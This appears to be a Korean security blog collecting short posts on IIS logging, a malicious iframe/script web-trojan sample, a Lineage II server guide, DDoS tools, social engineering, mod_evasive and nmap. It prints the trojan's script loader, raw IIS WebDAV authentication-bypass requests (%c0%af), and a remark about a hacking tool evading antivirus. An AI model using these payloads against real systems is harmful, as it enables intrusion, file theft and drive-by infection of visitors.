영삼넷IT 강국 = 김영삼 블로그에 오신걸 환영합니다.

중국애들이 ccproxy를 통해 해킹시도할 때 real ip가 숨겨지죠. 그렇다고 real ip 못찾는 건 아니지만 IIS 로그에서 프록시를 통해서 Request 한 실제 IP를 남기는 설정방법이 있습니다.

몇몇 프록시 서버는 HTTP 헤더에 "X-Forwarded-For"추가하여 실제 공격자 IP를 포함시키는 경우가 있습니다.

이것을 IIS에서 남기도록 제한하는 설정으로 ASP 코드에 "Respnse.AppendToLog" 메소드를 사용하여 URL 쿼리상에 남기도록 설정할 수 있습니다.

단 이때 제약 사항은 IIS 로그에는 남지 않고 URI에서 나타나기 때문에 "pipe( | )" 문자로 구분해 줘야 합니다.

아래 ASP 코드는 Proxy 헤더 로그를 추가하도록 설정하는 방법입니다.

<%

   sHeader = Request.ServerVariables("X-Forwarded-For")

   if Len(sHeader)

     Then

            Response.AppendToLog " | " & sHeader

%>

추가로 포워드된 Proxy 헤더 정보가 남기게 됩니다.

Client IP, Remote_Addr, Remote_Host, Forwarded, VIA, HTTP_From, Remote_Host_Wp, Xconnection, Xroxy_Connection, X_Locking

요즘 유행하는 웹 트로이목마를 만드는 자바스크립트

1. 아래와 같은 iframe에 있는 사이트의 test.html 파일에는 악의적인 js가 숨겨져 있다.

<iframe src=http://www.test.com/test.html width=100 height=0 frameborder=0>

2. 숨겨진 js에 들어 있는 내용
document.writeln("<!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4.0 Transitional\/\/EN\">");
document.writeln("<HTML><HEAD>");
document.writeln("<META http-equiv=Content-Type content=\"text\/html; charset=big5\">");
document.writeln("<META content=\"MSHTML 6.00.2900.3059\" name=GENERATOR><\/HEAD>");
document.writeln("<BODY> ");
document.writeln("<DIV style=\"CURSOR: url(\'http:\/\/www.test.com\/\/z1.jpg\')\">");
document.writeln("<DIV ");
document.writeln("style=\"CURSOR: url(\'http:\/\/www.test.com\/\/z2.jpg\'
\"><\/DIV><\/DIV><\/BODY><\/HTML>")

3. test.js

<script src="http://www.test.com/test.js"></script>

Windows 2008 서버에는 Hyper-V라는 새로운 기능이 추가되어 있다고 합니다.
이 Hyper-V 는 한마디로 가상화 핵심기술이 다 녹아 들었습니다. 향후 가상화 기술이 보안기술의 핵심으로 등장할 전망입니다.

MS와 VMware가 가상화로 일대 생존을 건 치열한 격전을 치르게 될 것은 분명하고요.
일단 Hyper-V에서 지원되는 핵심기능을 살펴보면 입이 딱 벌어질 정도로 다음과 같습니다.

1. 가상 랜(Virtual LAN) 지원
2. 가상 머신을 위한 대용량 메모리 지원
3. 동시에 32비트와 64비트 구동
4. 각각의 가상 O/S(Guest OS라고 부르는 것 같음)마다 4CPU와 32GB 메모리 지원
5. 가상 머신을 위한 원 프로세스 또는 다수 프로세스 지원
6. Snapshot 기능 지원(VMware에서 가상 머신의 상태를 잠시 캡쳐해두고 멈추는 기능)
7. 간편한 마이그레이션 지원(VMware의 VMotion 기능과 유사한 것)으로 셧다운 없이 하나의 가상머신에서 다른 머신으로 옮겨지는 기능 지원
8. 가상 머신마다 네트워크 로드 발렌싱 기능 지원
9. 마이크로소프트의 가상 머신 관리자(Microsfot Virtual Machine Manager)로 중앙에서 가상 머신을 관리할 수 있음

워낙 중국 해커들 게임해킹 실력은 장난이 아니라서 왠만한 게임분석은 어렵지 않게 합니다.
옛날 중국애들이 분석한 리니지2 (천당2)의 게임를 분석한 내용입니다. 대충 보시면 어떻게 구성되고 구동되는지 짐작할 수 있습니다.

必备条件：
1、操作系统 Windows 2003 Enterprise Edition
2、数据库   Microsoft SQL Corpotation 2000+SP4
3、天堂II服务端程序

L2server.exe  及其相关配置文件
L2NPC.exe    及其相关配置文件
L2AuthD.exe  及其相关配置文件
Cached.exe  及其相关配置文件
Html 以及 Scrip t脚本目录
GeoData  地图文件
Patch.dll  四章功能扩展文件

4、数据库脚本
① lin2comm_new(IP) 脚本内包含服务器IP地址、数据库访问用户名(gamma)、对应用户名的密码用记事本打开修改一下
② 1_lin2db
③ 2_lin2db_update
④ lin2report
⑤ lin2user
⑥ 1_lin2world 脚本内包含服务器IP地址、数据库访问用户名(gamma)、对应用户名的密码 用记事本打开修改一下
⑦ 2_lin2world（这个是四章的第二个Lin2world库的脚本）

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003, Enterprise" /fastdetect /3GB
减少lin2server停止错误（加完/3GB以后不要加载任何启动程序例如：防火墙系统容易蓝屏需要启动安全模式下删除启动程序）

之前请先确认你从来没有运行过服务器端的应用程序，如果运行了，请运行regedit删除
[HKEY_LOCAL_MACHINE\SOFTWARE\NCSOFT]
[HKEY_LOCAL_MACHINE\SOFTWARE\PROJECT_L2]
这两个键值，如果没有运行过轻跳过这一步，进入下面的步骤

调整好了操作系统之后就可以开始安装SQL了。SQL的安装过程就不用我多说了吧？自己记住SA的密码就好了。
安装好SQL之后打开企业管理器依次创建 Lin2comm Lin2db Lin2report Lin2user Lin2world这5个数据库。创建好了之后进入安全性--〉登陆 创建一个名为gamma的用户，然后在创建窗口最上面选择数据库访问标签。依次给Lin2comm Lin2db Lin2report Lin2user Lin2world这5个数据库选中Public以及db_owner角色。5个数据库全都要选择这2个角色。然后点确定，再次输入Gamma的确认密码就Ok了。

将Patch.dll复制到windows\system32 并且设置只读属性。

然后去ODBC建立文件DSN。过程：选择文件DSN标签--〉添加---〉SQL Server---〉下一步---〉数据源名字（和数据库名字一样就OK了。一共5个。）---〉剩下的一路填写相关信息就建立好了。对应5个数据库全部都要建立。

之后建立系统DSN，一共2个，一个指向Lin2db 一个指向Lin2world 使用Windows NT验证方式。

然后打开SQL的查询分析器，输入gamma的用户名和密码，对应每个数据库打开数据库脚本，然后执行就OK了。
注意：Lin2db和Lin2world都有2个脚本。按照顺序依次执行查询。

数据库脚本查询后的重要一步，打开lin2d库中的server表，填入以下内容
PS:此处填写的两个IP地址第一个是外网IP地址，第二个是内网IP，如果不开内网就写外网的。都不能使用域名。为什么别问我，NCsoft说了算。
1   名字   服务器ip   服务器ip   1   1   1   端口
1   XXWZ   222.222.222.222   222.222.222.222   1   1   1   7777

现在开始配置服务器端的配置文件

NewAuth\etc\config.txt

serverPort = 2104
serverExPort = 2106
serverIntPort = 2108
worldport = 7777
DBConnectionNum=10
encrypt = true
numServerThread = 2
numServerExThread = 2
numServerIntThread = 2
logDirectory="d:\l2serverwork\log"
;30206 : l2, 30310 : Sl
ProtocolVersion = 30810
;8:lineage2, 4 halo
GameID=8
DesApply=false
PacketSizeType = 3
ReadLocalServerList=false
OneTimeLogOut=true
CountryCode=3
DevConnectOuter=true
DevServerIP="222.222.222.222" <---此处填写外网IP地址
下面内容省略了。都一样。


L2Server\l2server.ini

[CacheD]
address="222.222.222.222" <---此处填写外网IP地址
port=2006

[AuthD]
;l2server
address="222.222.222.222" <---此处填写外网IP地址
port=2104

[World]
WorldId=3
UserLimit=1500 <---此处是服务器连接最大数限制
;LetBuilder=1

[PetitionD]
address="222.222.222.222" <---此处填写外网IP地址
port=2107
WorldName="publish03"
;world name must be exact 9 characters.

[Report]
Interval=50   <---此处是报告时间，调的长一点可以节约资源

[Setting]
country=3
UserPathFind=false
WorldCollision=false
ExceptionMailing=false
MailServer=mail.ncsoft.co.kr
AcceptLowerProtocol=true
IOBufferCount=6000   <---此处是个重要的参数，机器越差请调整的越低
;limit hour for week, (number means hour. 0 means don't use. default is 0)
playtimelimit=0

reconnectauth=1
;use auth reconn (1:use, 0:don't. default is 0)这里填写0为服务器维护 1为正常开启

www.5 uwl.net
L2NPC\ L2NPC.ini

[CacheD]
address="222.222.222.222" <---此处填写外网IP地址
port=2008

[Server]
address="222.222.222.222" <---此处填写外网IP地址
port=2002

[db]
address="222.222.222.222" <---此处填写外网IP地址
port=2005
user="gamma"     <---此处填写数据库用户名
password="xxxxxxx"   <---此处填写数据库密码

[map]
directory="geodata"

[LogD]
address="222.222.222.222" <---此处填写外网IP地址
port=3999

[World]
WorldId=3

[Setting]
country=3
ExceptionMailing=false
MailServer=ncs-mail.ncsoft.co.kr

全部配置完成后，请依次运行运行：

CacheD--------------------第1个启动
第一次输入
File DB:lin2world
Log Name:gamma
Passwoed:你的gamma密码
第二次输入
File DB:lin2comm
Log Name:gamma
Passwoed:你的gamma密码
NewAuth------------------第2个启动
File DB:lin2db
Log Name:gamma
Passwoed:你的gamma密码
L2Server------------------第3个启动
L2NPC--------------------第4个启动

최근 Zone-h.org에서 이슬람 해킹 툴에 관한 흥미로운 기사가 하나 있었습니다.
이슬람 해킹은 우리에게는 아직은 낯설게 느껴지고 있습니다.
무자헤딘 비밀2(Mujahedeen Secrets)라고 하는 툴에 관한 이야기 입니다.
이 툴은 글로벌 이슬람 미디어 프론트(Global Islamic Media Front)라는 단체에서 배포하는 암호화 툴이라고 합니다.
"Asrar Al-Mujahidin" 또는 "Mujahedeen Secrets"라고도 하며 알카에다나 탈레반이 인터넷으로 통신할 때 게시판 내용, 메신저나 채팅 내용을 암호화시켜주는 툴입니다.  
이 프로그램은 멀티케스트 이슬람 네트워크 망을 보호하고 그 포함되는 모든 컨텐츠들을 아주 작은 사이즈로 암호화 시켜준다고 합니다.

글쎄 AES는 미국 NIST에서 만든 암호 알고리즘인데 암호화 알고리즘을 미국 걸 쓴다니 아이러니합니다. 이것으로 미국의 강력한 인터넷 도청을 피할 수 있다고 생각하고 있는 것은 아닌지..

1) 첫번째 버전에 포함된 기능   

- 5가지의 강력한 암호화 알고리즘(AES finalist algorithms)
- symmetrical encryption keys 256-bit (Ultra Strong Symmetric Encryption).
- encryption keys for symmetric length of 2048-bit RSA (private and public).
- ROM 압축(compression) (highest levels 압축)
- stealthy ciphering
- cipher auto-detection.
- sile shredder

2) 두번째 버전에 포함된 기능

- messaging 보호
- files to text encoding
- checking digital signatures of files
- creating digital signature of the file

2006년 뉴질랜드의 한 보안 컨설턴트가 발견한 방법이라고 합니다. 아직 패치는 나오지 않은 상태이고 Windows XP가 화면 잠김 상태일때 패스워드 없이도 Unlock 시킬 수 있는 툴을 하나 만들어서 발표을 한 모양입니다. Firewire라는 걸 이용한다고 합니다.


원문)
http://www.smh.com.au/news/security/hack-into-a-windows-pc--no-password-needed/2008/03/04/1204402423638.html

주) Firewire란
미국 애플 컴퓨터 회사와 텍사스 인스트루먼트(Texas Instruments)사가 공동으로 제창한 고속 직렬 데이터 버스 규격. 케이블의 전기적 특성이나 접속기의 형상 등 물리적인 부분에 대해서 결정된 규격으로, 후에 IEEE 1394로 규격화되었다. IEEE 1394는 주로 PC와 AV 기기의 접속을 상정한 통신 규격으로서 디지털 동화상 전송 등을 의식해서 만든 것이다. ‘Fire-Wire’라는 명칭은 ‘불에 타서 연기가 올라가는 만큼 빠른 속도’라는 의미에서 붙여졌다.

  IEEE 1394의 규격은 파이어와이어 400과, 800이 있는데 각각 약 100/200/400Mbps, 800Mbps의 전송 속도를 지원한다. 두 규격은 모두 핫 플러깅을 지원한다.
IEEE 1394, 혹은 파이어와이어(FireWire), 아이링크(i.Link)는 같은 말이다.

해킹기술은 눈부신 정도로 엄청난 기술 발전를 가져오고 있다.
이제는 직접 서버를 해킹하지 않아도 해킹할 수 있는 기술들이 속속 등장하고 있다. 인터넷 곳곳이 다 지뢰밭인 셈이다.
웹서핑할 때 마다 악성코드가 숨겨진 것이 없는지 부비트랩이나 함정 탐지하듯 해야 하는 시대가 되가고 있다.
해킹기술의 최고 정점은 Human Hacking이다.

Did you know that humans get Hacked as much as computers?
It is called social engineering and it has been happening long before computers ever existed!
 
바로 사회공학적인 공학기법이다. 컴퓨터가 존재하기도 전에 이 방법은 존재했었다.

1. Hacking Humans

Social engineering is the human side of breaking into a corporate network. Companies like ours with authentication processes, firewalls, VPNs and network monitoring software are still wide open to an attack if an employee unwittingly gives away key information in an email, by answering questions over the phone with someone they don't know or failing to ask the right questions.

2. Social Engineering, an Example
AOL experienced a social engineering attack that compromised their system and revealed confidential information of more than 200 accounts. In that case the caller contacted AOL's tech support and spoke with an employee for an hour. During the conversation the caller mentioned that his car was for sale at a great price. The employee was interested, so the caller sent an e-mail attachment with a picture of the car. Instead of a car photo, the mail executed a backdoor exploit that opened a connection out from AOL through the firewall. Through this combination of social engineering and technical exploitation, the caller gained access to the internal network.

3. Forms of Social Engineering
Social engineering is not limited to phone calls; many organizations have reported cases involving visitors impersonating a telephone repair technician requesting access to a wiring closet or a new member of the IT department needing help accessing a file.

People, for the most part, look at social engineering as an attack on their intelligence and no one wants to be considered "ignorant" enough to have been a victim. It's important to remember that no matter who you are, you are susceptible to a social engineering attack.

If you suspect social engineering – don't be afraid to ask questions and/or notify your IT department. If a caller requests information that is technical in nature, please refer them to your IT department.

[원문]
http://www.auditmypc.com/freescan/readingroom/social-engineering.asp

작년에 아이템베이등 국내 아이템 거래 사이트를 초토화 시키고 최근에 웹 사이트를 대상으로 하는 랜섬어택으로 DDoS를 많이 당하고 있는데 사용된 툴이라고 합니다,
아래 사이트에서 공격 데모를 보여주고 있습니다.
데모 화면을 보시면 중국해커 PC에 어떤 프로그램이 설치되어 있는지 그리고 주로 무슨 툴을 사용하는지도 엿볼 수 있습니다.
여기서 해커의 성향을 엿볼 수 있는데 지금 데모를 하는 중국해커는 공격성향이 강한 사람 같습니다. 데모지만 실제 서비스 사이트에 대해 주저하지 않고 공격을 해버립니다.
근데 한가지 의문은 데모에서 단지 5대의 좀비 PC로 웹 서버가 죽는게 이상합니다. 5대 좀비 PC 가지고 대량의 트래픽 발생한다는 것은 불가능한데도 웹 서버가 죽는 것 보면 뭔가 특별한 DoS 공격인 것 같습니다.
잘 보시면 DoS 공격 타입이 CC Attack 타입을 선택하고 있습니다. 이 부분이 핵심입니다.
PC 화면에 보니 syser, MS VC++, GMER, FBFD.EXE, ooBar2000.exe, Samsung PC Studio3(삼성 휴대폰 연결프로그램), 중국어로 된 각종 기능을 알 수 없는 프로그램들...   아래 화면을 보시면 NetBot Attacker에서 아이피 주소와 한국이라는 도메인이 나오는 부분이 있는데 이게 바로 자동으로 좀비 PC가 해커 PC로 리버스 커넥션한 좀비 PC 리스트입니다. 그리고 옆에다 찍으면 그 좀비 PC가 공격하는 형태입니다.

해킹은 확실히 공격하는 측보다는 막는 측이 불리합니다.
DDoS 공격툴은 확실히 가난하지만 사악한 Hacker자들이 선호하는 무기입니다.

http://www.hackeroo.com/move/netbot_attacker.html

(1) NetBot Attacker 1.6 Public 버전(이 프로그램이 필요하다면 돈주고 사라고 합니다)

 

Windows 2008이 나오면서 액티브 디렉터리(Active Directory)의 위상이 바뀌고 있습니다. 과거 시스템의 대부분이 AD가 없어도 잘 동작하는 환경에서 나왔지만, 보안이 점차 중요해지면서 합법적인 권한을 부여 받기 위한 환경을 구성하기 위해 AD를 요구하는 프로그램들이 점차 늘어가고 있기 때문입니다. 물론, AD가 없는 환경에서도 잘 동작하는 프로그램도 많이 있지만, AD가 없어도 잘 동작하는 프로그램이라도 AD가 있으면 보다 더 짧은 작업 시간을 들여서 같은 효과를 낼 수 있습니다.

과거의 AD는 특정 응용 프로그램(예를 들면 익스체인지 같은..)을 동작하기 위해 필요했지만, 이제는 단순한 응용 프로그램의 동작을 넘어 다수의 시스템 통합에 사용됩니다. 점차적으로 시스템이 많아지고 복잡해지면서 직원이 작업에 필요한 부분에 접근하는 일이 많아지고 있습니다. 접근할 일이 많다는 것은 곧 허가를 받아야 한다는 것이고, 이런 작업은 생산성과 관련된 업무와는 거리가 있는 일입니다.

VPN 장비가 있다고 가정을 해봅시다. VPN에는 접근할 수 있는 사용자의 계정이 존재하며, 계정에 따라 접근할 수 있는 범위가 다릅니다. (1)VPN에 접근하기 위해서 사용자는 자신의 정보를 제공해야 합니다. VPN에 접근한 사용자는 회선만 연결한 상태이므로 자신이 쉽게 (2)작업을 할 수 있는 자신의 PC에 접속을 합니다. 그 후에 (3)자신이 원하는 자원이 있는 곳에 접근하기 위해서 자신의 정보를 입력해야 합니다. 보통 한 곳만 보면 모든 일이 해결되는 것이 아니므로 보통 서너번 더 정보를 입력해야 원하는 정보까지 접근할 수 있습니다. 이렇게 잦은 정보의 입력은 사용자에게 불편함을 가져오고, 시스템에는 과부하로, 그리고 보안상에서는 헛점으로 남습니다.

일반적인 회사에서 현실적으로 직원 한 명이 커버 가능한 서버의 댓수는 몇 대 일까요? 서버를 점검하는 가장 간단한 방법은 이벤트 뷰어를 보는 것이겠지요. 그러면 한번 단순한 계산을 해봅시다. 서버 1대를 점검하는데 걸리는 시간을 확인해봅시다.

전체 소요시간은 5+10+5+(20x3)+5하여 85초가 소요됩니다. 오차를 위해 5초의 추가 시간을 주면 1분 30초라는 짧은 시간이 나옵니다. 그러면 서버가 늘어나면 어떻게 될까요?

위 과정은 서버의 증설에 따라 시간이 점차 늘어납니다. 위 표를 보면 서버가 100대가 되었을 때를 기준으로 보면, 전체 소요시간은 2시간 21분 40초로 나와있지만, 실제 원하는 작업인 이벤트 뷰어를 보는 시간은 1시간 40분 정도 밖에 되지 않습니다. 전체 작업 시간은 약 140분이지만, 실제 작업에 필요한 시간은 100분 정도입니다. 최종 작업을 위해 40분 정도를 낭비한 것입니다. 더구나 위의 표는 상당히 이상적인 시간을 기록한 것니까 실제 업무에서는 더 많은 시간이 소요됩니다.

그렇다면 AD를 적용하면 어떻게 될까요? 이벤트 뷰어를 하나 열고 컴퓨터에 접속을 하기만 하면 되고, 보다 귀찮으신 분이라면 이를 다 연결해둔 다음에 파일로 저장해 둔다면, 1번의 실행과 이벤트 뷰어의 확인 시간만 소요될 것입니다. 즉, 100대 기준으로 보면 1시간 40분+5초라는 시간이 걸립니다.

소규모인 경우에는 AD의 유지 비용이 있기 때문에 오히려 더 큰 손실을 입을 수 있습니다. 하지만, 같은 층에 같은 레벨에 컴퓨터가 다수 있다면, 이에 대한 효과적인 접근 방법 및 제어를 이루기 위한 방법으로 AD의 도입은 필수가 아닐까요? 물론 MOM과 같은 전문 모니터링 툴을 사용한다면, 이런 불편함은 없겠지만 말이죠.

출처: http://www.ntfaq.co.kr/4326

Windows Server 2003 Resource Kit에는 tinyget이라는 외부 명령어가 있다. tinyget은 명령줄 기반의 HTTP 클라이언트로 웹 브라우징에 사용하기 위한 용도로 제공되는 것이 아니라 디버깅 및 단순 스트레스 테스트를 위해서 사용할 수 있는 프로그램이다.

tinyget을 실행해보면 복잡한 옵션이 있지만, 복잡한 옵션 중에서 화면에 결과물을 보기위한 기본적인 사용법은 다음과 같이 하면 된다.

예를 들어, www.ntfaq.co.kr 사이트의 결과를 보고 싶다면 다음과 같이 명령어를 사용하면 된다.

 위의 예제에 쓰인 옵션을 설명하면 다음과 같다.

• srv : 서버에 접속할 주소로 파일 명까지 포함한 것이 아니라 도메인 명이나 IP만 써야 한다.
• uri : 접속할 경로 및 페이지와 파라메터. 예제에서는 /를 지정하였으므로 기본 페이지를 지정함. 특정 파일 경로와 파일 지정할 때에는 /대신에 다음과 같이 입력하면 된다. /guestbook?page=2
• d : 데이터를 보여 준다. h는 헤더를 보여주며, t를 사용할 시에는 주고 보낸 모든 응답을 보여준다.

 하지만, 서버 앞에 L4같은 로드벨런서 장비가 있는 경우에는 원하는 결과를 얻을 수 없다. 예를 들면, tinyget –srv:www.ntfaq.co.kr –uri:/ –d 는 정상적인 NTFAQ Korea 사이트로 표기되지만, tinyget –srv:211.172.252.15 –uri:/ –d 는 원하는 결과가 아니다. 이러한 차이는 호스트 헤더를 통해 웹서비스를 구분하기 때문인데, tinyget에는 –rh(-reqheaders) 를 이용하여 다음과 같이 지정할 수 있다.

-d 옵션을 사용하는 경우, 결과물을 눈으로 보기란 힘들기 때문에 -h를 사용해서 간략화 시키는 방안도 좋지만,

보다 깔끔하게 하기 위해서는 정상일 때 결과값을 지정해두고 오류가 났을 때만 보이도록 설정하는 게 더 깔끔하다.

헤더값 체크로 만족스럽지 않다면, 아예 본문에 오류 문자열이 있는지 확인하는 것도 좋다

 이렇게 다양한 옵션을 통해 원하는 결과를 얻을 수 있지만, 이 결과를 어떻게 효과적으로 모니터링할 것인지는 관리자의 몫으로 남겨두겠다.

 tinyget을 모니터링 이외에 사용하는 또 하나의 좋은 방안은 ASP.NET이나 JSP로 된 사이트의 경우 접속자가 매우 적거나 시스템을 재부팅한 경우, 첫번째 접속자는 컴파일이 되기 전이므로 컴파일 완료시까지 오류를 만나기 쉬운데 이를 막고자 하는 용도로도 사용하기에 적합하다는 점이다.

출처 : http://www.ntfaq.co.kr/4314

공격자가 자신의 PC에 웹사이트의 취약점을 찾아 이를 해킹할 수 있는 자동 공격 프로그램 화면을 띄운다. 공격자가 취약점 탐색 버튼을 클릭하자 보안이 취약한 웹서버들이 줄줄이 걸려든다.

이 중 한곳을 타깃으로 공격자가 공격명령을 실행하자 해당 웹서버의 관리자 권한이 장악됐다. 한순간이었다. 공격자는 원격접속 프로그램을 해당 웹서버에 설치하면 눈앞의 모니터 화면으로 마치 자신의 PC처럼 통제가 가능한 상황.

이후 공격자가 사용한 공격 방식은 'ARP 스푸핑(Spoofing)'. ARP란 IP 네트워상에서 IP 주소를 물리적 네트워크(장비) 주소로 대응시키기 위한 프로토콜로, 이를 조작하면 동일한 네트워크를 물려있는 다른 웹서버나 PC의 모든 이동중인 데이터 패킷을 볼 수 있게 된다.

공격자는 이 공격을 통해 같은 네트워크에 물려있는 모든 웹사이트(웹서버)의 방문자들을 상대로 개인정보를 빼내는 악성코드가 자동으로 유포되도록 조작했다. 이 경우, 사용자가 다른 정상적인 웹서버에 접속해도 이용자PC에 전송되는 데이터는 모두 이곳을 경유해 공격자가 미리 숨겨놓은 악성코드를 받아가게되는 것이다.

◆패치 상업화 경향…반드시 설치해야 = 확인된 공격 방법에 대한 패치 평균개발 기간은 6.8일로 지난해 상반기와 비교했을 때 약 하루 정도 더 늘어났다. 시만텍 측은 이 같은 패치 개발 지연 경향이 '패치 상업화'에 따른 것으로 보고 있다. 그러나 시만텍 관계자는 "웹서버나 데스크톱에 새로 설치한 운영체제를 감염시키는데 걸리는 시간을 분석해 본 결과 패치를 설치한 PC는 모든 종류의 운영체제에서 감염 문제가 없었다"며 "운영시스템 및 애플리케이션 패치를 하지 않으면 감염 치료-재감염의 악순환이 계속될 수밖에 없다"고 설명했다.

◆올해 보안 위협 어떤 변화 있나 =시 만텍은 사용자가 눈치채지 못하게 은밀한 공격을 실행하는 악성 코드가 증가할 것으로 예상했다. 또 ▲상업화된 취약점 연구가 증가하고, ▲비전통적인 플랫폼(휴대전화, PDA, 맥OSX 등)에 대한 공격이 늘어나며, ▲인스턴트 메시징을 통해 피싱이나 악성 코드의 배포가 급증할 것으로 내다봤다.

자료출처 : '중국발 해킹' 올바로 대처하라

5월 18일 오늘(미국 기준), IIS 5/6의 WebDAV에서 보안 인증을 우회하는 취약점이 발견되었습니다.

보안에 관심을 가지고 계신 분이라면 WebDAV 취약점은 지난 2001년도에 IIS 4/5에서 발생한 MS01-26이 생각날 수도 있습니다. 이는 폴더 이름에 사용되는 문자에 유니코드로 인코딩하는 것을 지원하면서 발생한 것으로 가장 대표적인 것이 "../.."을 "..%c0%af.."로 인코딩하게 되면 보안 권한 검사를 거치지 않고 곧바로 파일에 액세스할 수 있게 된 문제점입니다.

하여튼, 이 번에 새로 발견된 WebDAV 취약점을 통해 공격자는 비밀번호로 잠근 디렉터리를 액세스하거나 파일을 다운로드 또는 업로드할 수 있습니다. Nicolas Rangos에 따르면 WebDAV의 작업 폴더가 아닌 IIS 전체의 폴더에 취약점이 노출되어 있다고 합니다. 원인은 유니코드 문제를 처리하는 과정에서 발생한다고 합니다.

아래와 같이 비밀번호로 보호되는 폴더의 파일을 GET 명령어를 통해 요청을 하게 되면 인증을 거치치 않고 접근이 가능하게 됩니다.

GET /..%c0%af/protected/protected.zip HTTP/1.1Translate: fConnection: closeHost: servername

"/" 문자는 %c0%af 라는 유니코드 값으로 인코딩되어 /protected/protected.zip 파일에 접근할 수 있게 됩니다. 또한, Translate:f 옵션을 통해 WebDAV의 기능으로 디렉터리를 접글할 수 있습니다.

또한 WebDAV 폴더에 대한 공격은 약간 더 복잡하지만 다음과 같은 방법으로 업로드나 다운로드가 가능합니다.

PROPFIND /protec%c0%afted/ HTTP/1.1Host: servernameUser-Agent: neo/0.12.2Connection: TETE: trailersDepth: 1Content-Length: 288Content-Type: application/xml<?xml version="1.0" encoding="utf-8"?><propfind xmlns="DAV:"><prop><getcontentlength xmlns="DAV:"/><getlastmodified xmlns="DAV:"/><executable xmlns="http://apache.org/dav/props/"/><resourcetype xmlns="DAV:"/><checked-in xmlns="DAV:"/><checked-out xmlns="DAV:"/></prop></propfind>

다행인 점은 일부 IIS 7에서는 WebDAV에 관련된 취약점이 발생하지 않는 다는 것입니다.

아직 이 문제점에 대한 해결책은 나와 있지 않지만 가장 좋은 방법은 WebDAV를 일시적으로 중지하는 것입니다.

자료출처: http://secunia.com/advisories/35109/
MS 자료: http://www.microsoft.com/technet/security/advisory/971492.mspx

os Sulinux 1.5

Dos공격 방어 (mod_evasive) 설치

# wget http://www.zdziarski.com/projects/mod_evasive/mod_evasive_1.10.1.tar.gz

mod_evasive_1.10.1.tar.tar

http.conf

<ifModule mod_evasive20.c>
DOSHashTableSize 3097
DOSPageCount 3
DOSSiteCount 50
DOSPageInterval 1
DOSSiteInterval 1
DOSBlockingPeriod 30
</IfModule>

dos 차단 테스트

[root@mail mod_evasive]# perl test.pl
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 403 Forbidden
HTTP/1.1 403 Forbidden
HTTP/1.1 403 Forbidden
HTTP/1.1 403 Forbidden
HTTP/1.1 403 Forbidden
HTTP/1.1 403 Forbidden
HTTP/1.1 403 Forbidden
..생략...

# cd /tmp

# ls -al | grep 127.0.0.1
-rw-r--r--   1 nobody 4294967295    6  3월 13 14:04 dos-127.0.0.1

위와 같이 test.pl 실행하면 HTTP/1.1 403 Forbidden 메세지를 보여주고 접속 차단
/tmp에 저장 127.0.0.1 에서 DOS 공격이 차단 됐다는
dos-127.0.0.1파일이 생성 됐다는것이다

두번째방법으로 웹에서 새로고침 누르면
처음에 접속이 됐다가 두번째는 접속이 불가능

인가된 IP주소 할당

DOSWhitelist 127.0.0.1
DOSWhitelist 127.*.*.*

와일드카드(*)는 필요하다면 최대 xxx.*.*.* 까지 사용할 수 있다.

MSSQL Injection PWNage.pdf

다음은 페이퍼 목차입니다.

|=--------------------------------------------------------------------=|
|=----------------=[  Full MSSQL Injection PWNage  ]=-----------------=|
|=-----------------------=[ 28 January 2009 ]=------------------------=|
|=---------------------=[  By CWH Underground  ]=---------------------=|
|=--------------------------------------------------------------------=|


######
Info
######

Title : Full MSSQL Injection PWNage
Author : ZeQ3uL && JabAv0C
Team    : CWH Underground [www.milw0rm.com/author/1456]
Website : cwh.citec.us / www.citec.us
Date : 2009-01-28


##########
Contents
##########

  [0x00] - Introduction

  [0x01] - Know the Basic of SQL injection

[0x01a] - Introduction to SQL Injection Attack
[0x01b] - How to Test sites that are Vulnerable in SQL Injection
[0x01c] - Bypass Authentication with SQL Injection
[0x01d] - Audit Log Evasion
[0x01e] - (Perl Script) SQL-Google searching vulnerable sites

  [0x02] - MSSQL Normal SQL Injection Attack

[0x02a] - ODBC Error Message Attack with "HAVING" and "GROUP BY"
[0x02b] - ODBC Error Message Attack with "CONVERT"
[0x02c] - MSSQL Injection with UNION Attack
[0x02d] - MSSQL Injection in Web Services (SOAP Injection)

  [0x03] - MSSQL Blind SQL Injection Attack

[0x03a] - How to Test sites that are Vulnerable in Blind SQL Injection
[0x03b] - Determine data through Blind SQL Injection
[0x03c] - Exploit Query for get Table name
[0x03d] - Exploit Query for get Column name

  [0x04] - More Dangerous SQL Injection Attack

[0x04a] - Dangerous from Extended Stored Procedures
[0x04b] - Advanced SQL Injection Techniques
[0x04c] - Mass MSSQL Injection Worms

  [0x05] - MSSQL Injection Cheat Sheet

  [0x06] - SQL Injection Countermeasures

  [0x07] - References

  [0x08] - Greetz To

진짜 희안하네요.ㅎㅎ 아직도 약간에 꽁수를 쓰면 알약/에서 안걸린다는 제길 ~~

해킹툴.zip

1. 설치

http://www.insecure.org/nmap

nmap 의 홈페이지에서 소스파일을 내려 받습니다. 그 후에 설치할 디렉토리로 옮긴후에 압축을
풉니다. 그 후에 해당 디렉토리에서 ./configure 를 실행한 후에make, make install 을 실행합니다.

설치가 끝났으면 몇 가지 스캔 타입을 알아봅시당.

위의 스캔타입은 자주 쓰이는 내용이고 -h 옵션을 쓰거나 man page를 이용하면 아주 상세한
사용방법을 보실 수 있습니다.

2. 사용.

몇가지 사용 예를 통해 nmap을 활용해 보시죠.

-sP 옵션으로 대상호스트가 살아 있음을 알아냈습니다. 이젠 특정 포트(80)를 검색해 보겠습니다.

